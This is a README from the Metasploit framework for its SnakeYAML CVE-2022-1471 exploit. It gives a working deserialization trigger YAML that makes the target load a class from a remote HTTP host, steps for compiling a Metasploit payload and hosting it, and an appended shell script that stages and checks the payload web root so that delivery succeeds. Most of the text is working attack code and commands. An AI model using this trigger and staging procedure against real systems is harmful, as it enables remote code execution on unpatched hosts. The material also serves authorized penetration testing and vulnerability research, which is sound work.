rapid7/metasploit-framework
external/source/exploits/CVE-2022-1471/README.md

# Overview
The Java file in this directory loads and executes a Metasploit payload. It is intended to be loaded as part of the
exploit for CVE-2022-1471, an unsafe deserialization vulnerability in the SnakeYAML project: the default `Constructor`
instantiates arbitrary classes named by `!!` tags in attacker-controlled YAML.

See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.

## Compiling
It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the 
[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
files.

Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.

## Usage
Trigger the deserialization using the following YAML:
```yaml
!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
```

Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`. The
contents of this file should be just the class name to load (`MyScriptEngineFactory`): `ScriptEngineManager` uses
`ServiceLoader` to find and instantiate every factory listed there, which is what runs the class. The URL in the YAML
must end with a trailing `/`, otherwise `URLClassLoader` treats it as a JAR file rather than a directory root. See
Metasploit's `Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components
necessary to deliver a Metasploit payload.
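The compile-and-host procedure above, as an added example script (not part of this README, the exploit module or the
`ClassLoader` mixin). It assumes the compiled `MyScriptEngineFactory.class`, a local `metasploit-framework` checkout
for the classpath, and `python3 -m http.server` as a throwaway web server; the `stage_webroot` helper also handles a
class in a package, which the README's default-package case does not need.

```shell
#!/bin/sh
# Added example, not part of the Metasploit README or its exploit module.
# Lays out the web root that the URLClassLoader in the YAML trigger fetches
# from and sanity-checks it before serving. Assumed inputs: the compiled class
# file and, for the optional build step, a metasploit-framework checkout.
set -eu

# Stage <class-file> under <root> so that <root>/ can be served over HTTP:
#   <root>/<Class>.class                    (or <pkg>/<Class>.class for a packaged class)
#   <root>/META-INF/services/javax.script.ScriptEngineFactory   (one line: the class name)
# ServiceLoader reads the provider file, URLClassLoader fetches the named class.
stage_webroot() {
    root="$1"
    class_file="$2"
    # Fully qualified class name; defaults to the file name for the default package.
    class_name="${3:-$(basename "$class_file" .class)}"
    dest="$root/$(printf '%s' "$class_name" | tr . /).class"
    mkdir -p "$(dirname "$dest")" "$root/META-INF/services"
    cp "$class_file" "$dest"
    printf '%s\n' "$class_name" > "$root/META-INF/services/javax.script.ScriptEngineFactory"
}

# Return 0 only if the provider file exists and names a class file present under <root>.
# A mismatch here means ServiceLoader will silently find no provider and nothing runs.
check_webroot() {
    root="$1"
    svc="$root/META-INF/services/javax.script.ScriptEngineFactory"
    [ -f "$svc" ] || return 1
    name="$(head -n 1 "$svc")"
    [ -n "$name" ] || return 1
    [ -f "$root/$(printf '%s' "$name" | tr . /).class" ]
}

# Usage: ./stage.sh path/to/metasploit-framework www
# Compiles against the payload data directory (as in the README), stages the class
# and prints a serve command; the port must match the URL in the YAML trigger.
if [ $# -eq 2 ]; then
    javac -cp "$1/data/java" -d build MyScriptEngineFactory.java
    stage_webroot "$2" build/MyScriptEngineFactory.class
    check_webroot "$2"
    echo "now run: (cd '$2' && python3 -m http.server 8080)"
fi
```

`check_webroot` is worth running before every attempt: a typo in the provider file or a class compiled into a package
the file does not name produces no error on the target, only a deserialization that appears to do nothing.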

[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java